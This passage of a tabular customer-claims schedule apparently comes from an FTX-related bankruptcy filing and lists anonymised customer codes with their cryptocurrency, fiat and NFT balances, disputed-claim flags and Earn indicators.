| 07434379 | | BRZ[2], CUSDT[3], DOGE[3], GRT[2.08056028], NFT (294861042177610939/LightPunk #7532)[1], NFT (301573821864433492/Naked Meerkat #3893)[1], NFT (337983032125760206/SOLYETIS #4993)[1], NFT (375806696051065057/Cyber Pharmacist 9216)[1], NFT (429392504899634467/Solana Penguin #2770)[1], NFT (462913534964527140/Naked Meerkat #3277)[1], NFT (468258000856773305/Nifty Nanas #863)[1], NFT (473448991792350722/Fancy Frenchies #9774)[1], SHIB[2], SOL[7.90482550], TRX[3], UNI[0], USD[0.00], USDT[3.29639279] | Yes | |
| 07434384 | | USDT[0.95782402] | | |
| 07434387 | | ETH[.000719], ETHW[.000719], USD[0.79] | | |
| 07434388 | | AUD[26.00], BRZ[170.57275766], CUSDT[1460.13259856], DOGE[4], EUR[40.55], TRX[126.18589199], USD[0.00] | | |
| 07434392 | | BTC[0], DOGE[0], ETH[0], LINK[0], LTC[0], SOL[0], TRX[0], UNI[0], USD[0.00], USDT[.14066328] | | |
| 07434395 | | USD[0.03] | | |
| 07434396 | | USD[0.01], USDT[9.943781] | | |
| 07434398 | | CUSDT[4], DOGE[3542.14528961], GRT[1], SOL[.48669053], TRX[2], USD[0.01], USDT[0.00000001] | | |
| 07434408 | | CUSDT[1], GRT[1], SHIB[912143.0037003], SOL[8.36496387], TRX[1], USD[0.00] | Yes | |
| 07434409 | | USD[3.05] | | |
| 07434412 | | BAT[1.01609537], BRZ[1], BTC[.14877478], CUSDT[1], DOGE[18289.4145835], TRX[2], USD[0.00] | Yes | |
| 07434417 | | MATIC[5.5884507], SOL[0.00911000], USD[3.07] | | |
| 07434418 | | DOGE[3], SHIB[3], TRX[3.011145], USD[230.41], USDT[0.00000001] | | |
| 07434420 | | USD[38.86] | | |
| 07434423 | | BAT[2.05836518], BRZ[1], CUSDT[3], DOGE[10074.29628113], ETH[8.97139393], ETHW[8.96812673], GRT[2.01963874], SHIB[66711565.25024117], SOL[29.2129327], TRX[1], USD[0.00], USDT[2.09698794] | Yes | |
| 07434424 | | ALGO[0], BCH[0], BTC[0], CUSDT[0], DAI[0], DOGE[11.00050230], ETH[0], GRT[0], KSHIB[0], LINK[0], SHIB[0], SOL[0.00000001], SUSHI[0], TRX[11.90033621], USD[0.00], USDT[0] | Yes | |
| 07434438 | | BTC[.0001] | | |
| 07434441 | | DOGE[6.75259596], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07434442 | | SOL[0] | | |
| 07434446 | | USD[1.73] | | |
| 07434449 | | BTC[0], CUSDT[2], DOGE[0], GRT[1.00404471], USD[0.00], USDT[0] | Yes | |
| 07434455 | | BAT[.57], BCH[.004616], BTC[0.00032078], DOGE[1.388], ETH[.0009948], ETHW[.0009948], GRT[.2158], LINK[.00954], LTC[.00312], SOL[0.01912509], SUSHI[0.41457419], TRX[.078], UNI[.1049], USD[13522.56], YFI[.0001806] | | |
| 07434458 | | BAT[1.0165555], BTC[.0003218], CUSDT[2], DOGE[7322.64711974], SHIB[2], TRX[49.3411638], USD[0.00] | Yes | |
| 07434462 | | DOGE[1], ETH[.00369546], ETHW[.00369546], USD[0.00] | | |
| 07434463 | | DOGE[1], SOL[0] | Yes | |
| 07434464 | | USD[0.00], USDT[0] | | |
| 07434471 | | USD[0.00] | | |
| 07434472 | | USD[50.00] | | |
| 07434475 | | DOGE[.00067942], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07434476 | | BTC[0], DOGE[0], ETH[0], ETHW[0], GBP[0.71], LTC[0], SOL[0], TRX[0.00004617], USD[0.00], USDT[0.00000077] | | |
| 07434479 | | BRZ[1], ETH[0], SHIB[1], SOL[0], USD[0.00] | Yes | |
| 07434489 | | ETH[0], USD[0.00], USDT[0] | | |
| 07434491 | | BAT[1.0165555], CUSDT[7], DOGE[18338.54501292], ETH[.00969733], ETHW[.00957412], GRT[1.00498957], TRX[3], USD[7.08], USDT[1.09720575] | Yes | |
| 07434502 | | BAT[3.25173012], BRZ[3], CUSDT[31], DOGE[0], ETH[0], ETHW[0], NFT (306712601048920652/Entrance Voucher #3598)[1], NFT (387721453185933291/Fallen traveler #08)[1], SHIB[1], TRX[17.46491282], UNI[0], USD[0.00], USDT[3.24673585] | Yes | |
| 07434503 | | CUSDT[2], DOGE[1], LTC[0], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07434509 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07434511 | | USD[0.00] | | |
| 07434512 | | CUSDT[1], SOL[317.03246379], USD[4.64], USDT[1.02463455] | Yes | |
| 07434518 | | BTC[.00017239], CUSDT[5], ETH[.04514888], ETHW[.04514888], SOL[2.66226845], TRX[1], USD[0.00] | | |
| 07434520 | | BRZ[0], CUSDT[4], DOGE[0], GRT[0], SHIB[1], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07434532 | | CUSDT[4], DOGE[497.48524929], SHIB[1293.67388704], USD[6.12] | | |
| 07434534 | | BRZ[1], CUSDT[2], ETH[0], SUSHI[0] | | |
| 07434536 | | DOGE[150.48451831], SOL[2.65109275], TRX[2], USD[0.00] | | |
| 07434539 | | USD[100.00] | | |
| 07434541 | | DOGE[0], TRX[0], USD[0.00] | | |
| 07434548 | | DOGE[1], TRX[759.46233104], USD[0.00] | | |
| 07434549 | | BTC[0], TRX[0], USD[0.00] | | |
| 07434560 | | BTC[0.00005817], ETH[0], GBP[0.00], PAXG[0], USD[-0.27] | Yes | |
| 07434561 | | BAT[1], BRZ[12], CUSDT[36], DOGE[4], GRT[1], TRX[2], USD[0.01], USDT[2] | | |
| 07434562 | | NFT (363828135617829971/Aku World Avatar #149)[1] | | |
| 07434564 | | BRZ[1], LINK[3.93043299], TRX[1], USD[0.00] | | |
| 07434565 | | CUSDT[1], DOGE[133.83931984], ETH[.05833555], ETHW[.05833555], USD[0.00] | | |
| 07434566 | | BF_POINT[200], USD[0.01] | | |
| 07434568 | | BAT[0], BTC[0], DOGE[0], ETH[.00000001], GRT[0], LINK[0], MATIC[0], SHIB[0], SUSHI[0], TRX[0.00000046], UNI[0], USD[0.06], USDT[0] | | |
| 07434572 | | DOGE[.5768], USD[0.01] | | |
| 07434582 | | USD[0.00] | | |
| 07434583 | | BTC[.0000674], LTC[.003], USD[0.00] | | |
| 07434584 | | USD[0.00], WBTC[0] | | |
| 07434589 | | BF_POINT[200], BRZ[2], CUSDT[1], DOGE[1], ETH[.33533206], ETHW[.33533206], SHIB[19726448.56129286], USD[0.19] | | |
| 07434597 | | NFT (350974738469730357/Coachella x FTX Weekend 1 #27200)[1], USD[0.01], USDT[0] | | |
| 07434609 | Contingent, Disputed | NFT (348910118871904577/Aku World Avatar #14)[1], NFT (398810862583417715/Aku World Avatar #15)[1] | | |
| 07434610 | | BAT[0], BCH[0], BTC[0], DAI[0], ETH[0], PAXG[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07434620 | | BTC[0], DOGE[0], ETH[0], ETHW[0], USD[0.23] | Yes | |
| 07434625 | | BRZ[1], CUSDT[4], USD[0.00] | | |
| 07434627 | | LTC[0], NFT (362877221598124874/Birthday Cake #0989)[1], NFT (378060011149654147/The 2974 Collection #0989)[1], NFT (432320886408822403/Unity #151)[1], SOL[0], USD[0.00], USDT[0] | | |
| 07434633 | | ETHW[.00001], USD[1.28] | | |
| 07434637 | Contingent, Disputed | USD[0.01], USDT[0] | Yes | |
| 07434643 | | BTC[0], DOGE[0], ETH[0], LINK[0], LTC[0], SOL[0], TRX[0], UNI[0], USD[0.00], USDT[0.00000001] | | |
| 07434645 | | DOGE[0], USD[0.00] | Yes | |
| 07434657 | | USD[200.00] | | |
| 07434659 | | CUSDT[704.19], TRX[.327383], USD[0.01], USDT[0] | | |
| 07434660 | | DOGE[0.44004588], USDT[0] | | |
| 07434662 | | AAVE[0.00263531], BAT[11.64841322], BCH[0.00008122], BTC[0], CUSDT[1.00042826], DAI[0.00001665], DOGE[0.10113223], ETH[0], GRT[0.83360239], KSHIB[131.97797071], LINK[0.09189934], LTC[0.00183810], MATIC[0], PAXG[0.00008406], SHIB[70949.81407965], SOL[0], SUSHI[0], TRX[0], UNI[0.05369896], USD[-1.24], USDT[0.00012008], YFI[0] | Yes | |
| 07434666 | | BTC[0.00009990], USD[0.00], USDT[16.09450633] | | |
| 07434670 | | BRZ[1], BTC[0], CUSDT[2], DOGE[2], ETH[.00000001], ETHW[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07434676 | | TRX[.000002] | | |
| 07434681 | | BTC[0.30043547], DOGE[.356], TRX[10070.556], USD[93.94], USDT[0] | | |
| 07434691 | | AVAX[0], BTC[0], DOGE[0], ETH[0], GRT[3.11540119], KSHIB[0], LTC[0.00009850], MATIC[0], SHIB[4], SOL[.00066639], TRX[0], USD[69.93], USDT[0] | Yes | |
| 07434705 | | USD[0.00] | Yes | |
| 07434707 | | ETH[0], ETHW[0.00087832], USD[0.86] | | |
| 07434712 | | NFT (561630686380321877/Skaren #1)[1], USD[20.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07434723 | | BF_POINT[300], BTC[0], DOGE[1], ETH[0], GRT[0], LINK[0], MATIC[0], NFT (289291942015842687/Hall of Fantasy League #52)[1], NFT (303836276631180718/Hall of Fantasy League #32)[1], NFT (315037610252616940/Hall of Fantasy League #24)[1], NFT (342059596256975223/Hall of Fantasy League #33)[1], NFT (363319910117582452/Hall of Fantasy League #47)[1], NFT (363793809432342995/Hall of Fantasy League #27)[1], NFT (372970436119708073/Hall of Fantasy League #44)[1], NFT (375683819736894207/Hall of Fantasy League #38)[1], NFT (375808782792707030/Hall of Fantasy League #46)[1], NFT (376766999630428207/Cardano Crystal Ball )[1], NFT (396764040555280531/Hall of Fantasy League #48)[1], NFT (413145288286587482/Hall of Fantasy League #29)[1], NFT (421138328048169143/Hall of Fantasy League #26)[1], NFT (424077240773188879/Hall of Fantasy League #45)[1], NFT (433315910808906588/Hall of Fantasy League #37)[1], NFT (437509116709604128/Hall of Fantasy League #40)[1], NFT (444276424865656146/Hall of Fantasy League #42)[1], NFT (445268165195741681/Hall of Fantasy League #19)[1], NFT (472742214984346209/Hall of Fantasy League #34)[1], NFT (497521412393162775/Shannon Sharpe's Playbook: Kansas City Chiefs vs Denver Broncos - October 4, 1992 #25)[1], NFT (502102617355625420/Hall of Fantasy League #20)[1], NFT (510248920731902065/Hall of Fantasy League #23)[1], NFT (512697095079203911/Hall of Fantasy League #54)[1], NFT (516137748420804286/Hall of Fantasy League #31)[1], NFT (516782489814591906/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #69)[1], NFT (518194206975067608/Hall of Fantasy League #30)[1], NFT (518243837896604308/Hall of Fantasy League #51)[1], NFT (519363521688983504/Hall of Fantasy League #39)[1], NFT (530371750127080867/Bob Marley Painting #4)[1], NFT (557101536734373719/Hall of Fantasy League #18)[1], NFT (557636420758747128/Hall of Fantasy League #25)[1], NFT (562880582028297082/Hall of Fantasy League #35)[1], NFT (569729117869905708/Hall of Fantasy League #55)[1], NFT (572627961909242876/Hall of Fantasy League #36)[1], NFT (572795343323242963/Hall of Fantasy League #41)[1], SHIB[0], SOL[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07434729 | | BRZ[2], CUSDT[6], GRT[1.00404471], TRX[5], USD[0.01] | Yes | |
| 07434731 | | CUSDT[4], USD[0.00] | | |
| 07434739 | | CUSDT[3], USD[0.00] | Yes | |
| 07434740 | | BTC[0.00000388], DOGE[.3848], GRT[.4591], LINK[.08081], LTC[3.015433], TRX[.9466], USD[1.50] | | |
| 07434744 | | BRZ[1], BTC[.0086137], CUSDT[41], DOGE[253.47009951], ETH[.39152654], ETHW[.39152654], TRX[6], USD[0.01] | | |
| 07434746 | | SOL[0], USD[0.01], USDT[0] | | |
| 07434750 | | BCH[0], BTC[0], DOGE[0], USD[0.00], USDT[0.00000629] | | |
| 07434751 | | BRZ[5], CUSDT[4], DOGE[0.00001709], ETH[2.05903955], ETHW[2.05903955], LINK[.00002812], TRX[1], USD[0.00], USDT[0] | | |
| 07434753 | | ALGO[7.15510176], BRZ[1], BTC[0], DOGE[1], ETH[0], ETHW[0], LINK[0], PAXG[0], SHIB[64411.80105146], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07434763 | | BCH[.0291099], CUSDT[2], DOGE[121.80903565], SOL[1.27502366], TRX[1], USD[0.00], YFI[.00040747] | Yes | |
| 07434764 | | BAT[0], ETH[0], LTC[0], TRX[0], USD[0.00] | | |
| 07434765 | | BTC[0], LTC[.0099958], USD[0.00] | | |
| 07434774 | | BTC[0], SOL[0], TRX[0] | | |
| 07434778 | | BRZ[1], TRX[1], USD[0.01] | | |
| 07434781 | | AUD[8.24], DOGE[1], TRX[99.000003] | | |
| 07434787 | Contingent, Disputed | BTC[0], ETH[0.59934451], ETHW[0.59934451], USD[0.00] | | |
| 07434790 | | ETH[.010956], ETHW[.010956], USD[0.22] | | |
| 07434791 | | BCH[.00000037], ETH[.00000008], ETHW[.00000008], LTC[.0000005], SOL[.00000627], TRX[.00027973], USD[0.00], USDT[0.00001844] | Yes | |
| 07434797 | | BTC[0], ETH[0], SOL[0.09280000], USD[0.16], USDT[.009118] | | |
| 07434802 | | USD[1.00] | | |
| 07434805 | | DOGE[0], USD[0.01] | | |
| 07434810 | | BTC[.01289844], CUSDT[20], DOGE[3], ETH[.08399957], ETHW[.08399957], TRX[4], USD[0.01] | | |
| 07434812 | | SOL[0], USD[0.78] | | |
| 07434813 | | CUSDT[1], USD[0.00] | | |
| 07434814 | | BTC[.00002622] | | |
| 07434817 | | BRZ[1], CUSDT[3], DOGE[925.31899533], LINK[4.54999643], SHIB[900576.36887608], TRX[1], USD[0.62] | | |
| 07434819 | | AAVE[.00000869], AVAX[.0006473], BCH[.0000783], BTC[.00000037], DOGE[.1875596], ETH[.00001931], ETHW[.00001931], EUR[0.06], KSHIB[1.4582954], LINK[.00176389], LTC[.0004341], MATIC[.01676666], MKR[.00004125], SHIB[2409.30357019], SOL[.00468886], SUSHI[.00577321], UNI[.00369811], USD[0.84], YFI[.00000098] | | |
| 07434820 | | DOGE[.03718283], USD[0.00], USDT[0] | | |
| 07434828 | | BAT[1.01112388], BF_POINT[200], BTC[.00000746], CUSDT[2], DOGE[2], ETHW[2.15855069], NFT (558868461004517843/FTX - Off The Grid Miami #3711)[1], USD[0.61], USDT[1.06685814] | Yes | |
| 07434829 | | CUSDT[1], TRX[2], USD[0.00] | Yes | |
| 07434831 | | TRX[4], USD[0.00], USDT[0] | | |
| 07434833 | | BTC[.10347457], CUSDT[4], DOGE[1114.34702527], ETH[.6887011], ETHW[.68840547], GRT[1.00498957], SHIB[5], TRX[4], USD[0.00] | Yes | |
| 07434835 | | BTC[0.00003442], SOL[0], USD[0.85], USDT[0.00000029] | | |
| 07434838 | | CUSDT[1], DOGE[1], ETH[.02626291], ETHW[.02593459], SOL[.86053663], TRX[1], USD[0.00] | Yes | |
| 07434851 | | NEAR[1.82120473], SHIB[1], USD[0.00] | Yes | |
| 07434855 | | TRX[.000002], USD[0.36], USDT[.005482] | | |
| 07434863 | | USD[50.00] | | |
| 07434871 | | ETH[.0008309], ETHW[.0008309], SOL[.0879], USD[0.15] | | |
| 07434873 | | CUSDT[3], DOGE[1], ETH[.0000001], ETHW[.0000001], TRX[.00494358], USD[0.00] | Yes | |
| 07434882 | | BTC[0], ETH[0], LINK[0], NFT (421601868144902810/Earl Campbell's Playbook: Houston Oilers vs Chicago Bears - November 16, 1980 #8)[1], NFT (467585452635189771/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #9)[1], NFT (511782353149187269/Earl Campbell's Playbook: Texas vs Houston - November 5th, 1977 #10)[1], NFT (528404324186336648/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #9)[1], USD[21.83], USDT[0] | | |
| 07434885 | | BTC[0.02499712], NFT (289506551646402553/Entrance Voucher #3483)[1], TRX[31], USD[572.35] | | |
| 07434886 | | DOGE[2], TRX[1], USD[0.00] | | |
| 07434892 | | CUSDT[1], USD[0.00] | | |
| 07434895 | | BTC[.00004166], ETH[0], SOL[0.00000001], USD[0.00] | | |
| 07434896 | | BTC[.00000001], DAI[0], USD[0.00], USDT[0.00020740] | | |
| 07434911 | | DOGE[.8571735], USD[0.00] | | |
| 07434917 | | ETH[0], NFT (547261732635127782/Cyber Frogs Ramen)[1], USD[0.04], USDT[0] | | |
| 07434918 | | DOGE[1], GRT[1], USD[0.00], USDT[0] | Yes | |
| 07434920 | | SOL[17.22864601], USD[8051.66] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07434925 | | BRZ[2], DOGE[2], LTC[16.08019291], NFT (314534787004053221/#15 (O))[1], NFT (385305613731951667/#4 (D))[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07434928 | | BAT[2.07918924], BRZ[8.27157825], CUSDT[15], DOGE[11.04816826], ETH[.0000025], ETHW[0.00000250], GRT[1.00063035], SHIB[9], TRX[9], USD[0.00], USDT[0] | Yes | |
| 07434931 | | BRZ[1], CUSDT[3], DOGE[0], TRX[147.86074249], USD[1937.34] | Yes | |
| 07434932 | | NFT (295220981838113253/FTX - Off The Grid Miami #901)[1] | | |
| 07434935 | | SOL[0] | | |
| 07434938 | | CUSDT[1], USD[0.00] | | |
| 07434941 | | ETH[.00000001], ETHW[0.01122293], EUR[0.00], SOL[0], USD[0.00], USDT[0.00000004] | | |
| 07434947 | | DOGE[398.38412269], USD[0.00] | Yes | |
| 07434950 | | BTC[0.00008327], ETH[0], ETHW[0.00021648], SOL[0.15310339], USD[-0.11], USDT[0.00015044] | | |
| 07434954 | | CUSDT[2], TRX[1], USD[0.09], USDT[1] | | |
| 07434959 | | BRZ[63.31756169], USD[0.00] | Yes | |
| 07434961 | | CUSDT[1], DOGE[501.20284207], TRX[2], USD[0.00] | | |
| 07434965 | | AAVE[0.39493925], DOGE[0], ETH[0], LINK[0], USD[0.01], USDT[0] | Yes | |
| 07434971 | | DOGE[1], USD[0.00], USDT[24.86266831] | | |
| 07434981 | | DOGE[900.64807856], ETH[0], SHIB[96693.75074298], USD[0.00] | | |
| 07434989 | | NFT (488024381309059056/Silverstone Ticket Stub #284)[1] | | |
| 07434998 | | BAT[5.61031408], BRZ[1], CUSDT[2], DOGE[146.1623613], GRT[2.38114837], TRX[.72981967], USD[5.18] | | |
| 07435004 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07435007 | | BTC[.00004], DOGE[0], ETH[0], SOL[0], USDT[0] | | |
| 07435012 | | BTC[.00000014], ETH[.00001954], ETHW[.00001954], SHIB[2], TRX[1], USD[0.01], USDT[0] | Yes | |
| 07435015 | | ETH[0], TRX[0], USD[0.00] | Yes | |
| 07435021 | | BRZ[4], CUSDT[4], DOGE[788.58523735], GRT[1], USD[0.02], USDT[0.75756306] | | |
| 07435024 | | BAT[.00005534], BRZ[9.75850723], CUSDT[16], DOGE[7.18825918], TRX[14.13747358], USD[76.73], USDT[1.06483743] | Yes | |
| 07435026 | | USD[0.59], USDT[2.0434967] | | |
| 07435027 | Contingent, Disputed | USD[6.18] | | |
| 07435028 | | USD[27.62] | | |
| 07435029 | | BAT[2], BRZ[3], CUSDT[1], DOGE[5], GRT[2], TRX[5], USD[0.00], USDT[1] | | |
| 07435036 | | BRZ[1], CUSDT[8], DOGE[0], GRT[0], TRX[1], USD[0.01] | | |
| 07435044 | | BRZ[2], CUSDT[2], DOGE[2], TRX[2], USD[0.00] | Yes | |
| 07435045 | | SOL[.00001528] | Yes | |
| 07435046 | | BTC[.0000847], USD[21.55] | | |
| 07435049 | | GRT[1], USD[0.00] | | |
| 07435051 | | BTC[.018] | | |
| 07435057 | | USD[0.00] | Yes | |
| 07435064 | | BAT[1], DOGE[1], ETH[0], USD[0.00] | | |
| 07435065 | | DOGE[1], ETH[0], USD[0.00], USDT[0.00000001] | | |
| 07435068 | | BTC[.00755708], TRX[.756] | | |
| 07435069 | | BRZ[1], DOGE[1], NFT (325718819765090609/Vitalik Buterin 24x24 Pixel Painting)[1], NFT (329774182315243868/Sword of the Forest)[1], NFT (363269490748184923/Cubic Weight)[1], NFT (432636707785485115/Jon and Ygritte )[1], NFT (441757463732186861/Degen Ape Pixel Art Derivative #2)[1], NFT (468046233592502102/Ronin Duckie #33)[1], NFT (510118184617273370/CloudNFT Series 1 #1)[1], NFT (518442516524993799/Doge in Quarantine)[1], NFT (533153502246101 1348/Founding Frens Lawyer #785)[1], SHIB[1], SOL[.5195539], TRX[4444.3722842], USD[0.00], USDT[0] | Yes | |
| 07435070 | | BAT[0], BF_POINT[200], BTC[0], DOGE[0], ETH[0], ETHW[0], LINK[0], MATIC[0], SHIB[16], USD[332.14] | Yes | |
| 07435071 | | BAT[1.01655549], BF_POINT[200], BRZ[3], CUSDT[12], SOL[0], TRX[7], USD[0.00], USDT[1.11043162] | Yes | |
| 07435075 | | ETH[.42268463], ETHW[0.42268462], NFT (306243988724485389/Forbes VNFTB: Dawson Shepard)[1], NFT (403866185728414822/Forbes VNFTB: Davis Mooney)[1], NFT (527316478099263564/Forbes VNFTB: Nathalie Joseph)[1] | | |
| 07435088 | | BTC[.0000646], CUSDT[.8], DOGE[2140.395], ETH[.000065], ETHW[1.114065], GRT[.512], LTC[3.55572], MATIC[.19], SOL[.00815], SUSHI[.435], TRX[.519], USD[7263.41], USDT[.76692] | | |
| 07435098 | | CUSDT[13], ETH[.00004787], ETHW[.00004787], TRX[2], USD[2.95] | Yes | |
| 07435099 | | BRZ[3], BTC[.03282191], DOGE[6], ETH[.00001509], ETHW[0.00001508], GRT[3], PAXG[.25754236], SHIB[28], SOL[.00000001], TRX[7], USD[639.11] | Yes | |
| 07435102 | | CUSDT[3], DOGE[186.78554364], SUSHI[6.01660634], TRX[79.72806708], USD[0.00] | Yes | |
| 07435114 | | GRT[7.992], SOL[.0471], USD[1.39] | | |
| 07435115 | | DOGE[166.46520976], USD[0.00] | Yes | |
| 07435124 | | CUSDT[4], USD[0.96] | | |
| 07435125 | | BTC[0.03122975], DOGE[0], ETH[0.00022086], ETHW[0.00022086], SOL[0], USD[0.00], USDT[0] | | |
| 07435128 | | BTC[0], ETH[0], SOL[0.00000001], USD[0.00], USDT[0.00000197] | Yes | |
| 07435129 | | SOL[.28559336], USD[0.00] | | |
| 07435130 | | BRZ[1], CUSDT[2], DOGE[691.95625403], TRX[1695.81719916], USD[0.00] | Yes | |
| 07435131 | | USDT[0.00000001] | | |
| 07435136 | | BTC[0], COMP[1.98018], ETH[.00000001], SHIB[14472029.61965668], SOL[0.00797686], USD[1968.41] | | |
| 07435139 | | CUSDT[7], DOGE[1.56537639], ETH[.00002458], ETHW[.00002458], GRT[1.00498957], TRX[3], USD[0.00] | Yes | |
| 07435140 | | KSHIB[5010.31845958], SUSHI[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07435145 | | BTC[.00003077] | | |
| 07435167 | | SOL[2.35548604], USD[0.92] | | |
| 07435169 | | BRZ[1], CUSDT[7], DOGE[0], TRX[1], USD[0.00] | | |
| 07435170 | | BTC[.000028], SOL[.016], USD[1.63], USDT[0] | | |
| 07435174 | | ETH[.00087147], ETHW[0.00087146], SOL[.00000001], USDT[.0883532] | | |
| 07435175 | | BAT[0.38434501], BTC[.00025696], CUSDT[1], ETH[.01070261], ETHW[.01070261], GRT[0], SOL[0.00005965], TRX[2], USD[0.01] | | |
| 07435181 | | BF_POINT[400], BTC[0, CUSDT[21], DOGE[15.91795445], GRT[1], KSHIB[0], LINK[0], LTC[0], MATIC[0], MKR[0], PAXG[0], SHIB[0.00000114], SOL[0], TRX[3], USD[0.97], USDT[0.00001331] | Yes | |
| 07435192 | | BRZ[1], CUSDT[12], SHIB[1], USD[0.01] | Yes | |
| 07435211 | | CUSDT[1], DOGE[1], ETH[.01432996], ETHW[.00625705], SHIB[2], TRX[1], USD[0.00] | Yes | |
| 07435219 | | BCH[.0004196], BTC[.0001781], DOGE[.4562], ETH[.00012198], ETHW[.00012198], SOL[54.88884], TRX[.1384], USD[0.12] | | |
| 07435220 | | DAI[0.08039768], SOL[.006], USD[0.00] | | |
| 07435222 | | DOGE[0], SOL[0], USD[0.00], USDT[0.00000001] | | |
| 07435226 | | USD[1.23], USDT[0] | | |
| 07435227 | | TRX[.000003], USD[0.00], USDT[0] | | |
| 07435232 | | AUD[0.00], BTC[0], ETH[0], USD[0.01], USDT[0.00000001] | | |
| 07435235 | | CUSDT[2616.15297203], DOGE[3.000548], SOL[1.60628568], TRX[1719.54253421], USD[0.00], USDT[27.60675434] | Yes | |
| 07435236 | | USD[0.01], USDT[0] | | |
| 07435238 | | BAT[0], BRZ[2], BTC[0], CUSDT[10], DOGE[0], ETH[0], LINK[0], LTC[0], SOL[0], TRX[0], USD[0.00] | | |
| 07435250 | | SOL[0], USD[0.53] | | |
| 07435264 | | BRZ[1], BTC[0], DOGE[3], USD[0.01] | | |
| 07435267 | | USDT[0] | | |
| 07435272 | | BTC[.00001930], SOL[0], TRX[.490099], USD[13.10], USDT[0] | | |
| 07435274 | | BAT[0], BCH[0], DOGE[0], ETH[0], ETHW[0], LINK[0], TRX[0], USD[1.66] | | |
| 07435279 | | DOGE[2773.47333065], TRX[681.97716641], USD[0.00] | Yes | |
| 07435281 | | BAT[.05255046], BRZ[2], CUSDT[22.03815222], DOGE[1.31777198], GRT[.00001078], KSHIB[43.82278561], TRX[.03857726], USD[0.00] | Yes | |
| 07435285 | | BAT[1.0165555], BRZ[1], CUSDT[5], DOGE[1], TRX[2], USD[0.01], USDT[0] | Yes | |
| 07435290 | | CUSDT[945.67294705], DOGE[1], TRX[996.09914336], USD[0.01] | | |
| 07435304 | | BRZ[1], CUSDT[1], DOGE[1.23685081], USD[0.70], USDT[25.85717504] | | |
| 07435312 | | BRZ[2195.2609803], CUSDT[19342.00939131], DOGE[1], TRX[3528.93557871], USD[29.63] | Yes | |
| 07435316 | | USD[0.00] | | |
| 07435320 | | NFT[338986775903922943/Golden Hill #536][1], NFT[482814584308006070/Whales Nation #7644][1], SOL[.00000001] | | |
| 07435338 | | TRX[79.75954869], USD[0.00] | Yes | |
| 07435350 | | DOGE[30.78151192] | Yes | |
| 07435354 | | USDT[0] | | |
| 07435357 | | ALGO[.00030253], DOGE[1.00201739], ETH[.00000007], ETHW[.00748414], GRT[100.86267749], KSHIB[970.6553247], MATIC[10.2349336], SHIB[14.87130548], SOL[.000015], TRX[185.75736756], USD[0.00], USDT[0.00000001], YFI[.00000189] | Yes | |
| 07435358 | | BTC[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], MATIC[0], SOL[0], TRX[0], USD[0.00], USDT[0.00000072] | | |
| 07435359 | | BCH[.000936], BTC[0] | | |
| 07435361 | | ETH[0], SOL[0], USD[0.00], USDT[0] | | |
| 07435363 | | CUSDT[2351.3582862], DOGE[1939.28182499], USD[0.00] | | |
| 07435364 | | BRZ[2], CUSDT[5], DOGE[17077.32737677], MATIC[86.59909644], SHIB[6420661.24733436], TRX[4939.70066961], USD[-60.00] | Yes | |
| 07435374 | | CUSDT[7], DOGE[1], TRX[3], USD[0.00] | | |
| 07435375 | | BAT[2], BRZ[6], CUSDT[2], DOGE[4], SOL[0], TRX[2], USD[0.00] | | |
| 07435385 | | CUSDT[7], DOGE[29691349], USD[0.00], USDT[0.00009644] | Yes | |
| 07435386 | | BAT[10.2014654], DOGE[3], SUSHI[.71905919], USD[0.00] | | |
| 07435387 | | BTC[.0000849], USD[25.65] | | |
| 07435388 | | BAT[3.05262889], BRZ[1], BTC[0], CUSDT[8], DOGE[1], ETH[.00457586], ETHW[.00457586], LINK[.33989926], LTC[.22091825], SOL[.73921415], SUSHI[2.14938115], TRX[2], USD[0.00], USDT[0] | | |
| 07435398 | | SOL[0] | | |
| 07435401 | | CUSDT[3], TRX[2], USD[0.01] | Yes | |
| 07435406 | | BTC[.00004472], ETH[.00056899], ETHW[.00056899], TRX[.000011], USD[0.00], USDT[.001797] | | |
| 07435410 | | TRX[3] | | |
| 07435413 | | ETH[.0000009], ETHW[.0000009], SOL[.00004321], USD[0.00], USDT[0.00000463] | | |
| 07435418 | | TRX[.000006], USD[0.00], USDT[0.00451000] | | |
| 07435420 | | USD[0.00] | | |
| 07435425 | | SOL[.00657949], USD[0.59] | | |
| 07435433 | | CUSDT[8], DOGE[2.84930693], LINK[1.98351658], LTC[.30703169], MATIC[41.08723069], SOL[.33201566], USD[0.00] | Yes | |
| 07435440 | | BRZ[2], CUSDT[2], DOGE[1], SHIB[1910983.90479025], SOL[11.08463726], TRX[4], USD[0.00], USDT[1.10162335] | Yes | |
| 07435441 | | USD[44.44], USDT[0] | | |
| 07435443 | | BRZ[1], SHIB[1], SOL[.00193746], TRX[2], USD[8911.04] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07435445 | | ETH[0], ETHW[0], LTC[0], MATIC[0], USD[0.42], USDT[0.00932200] | | |
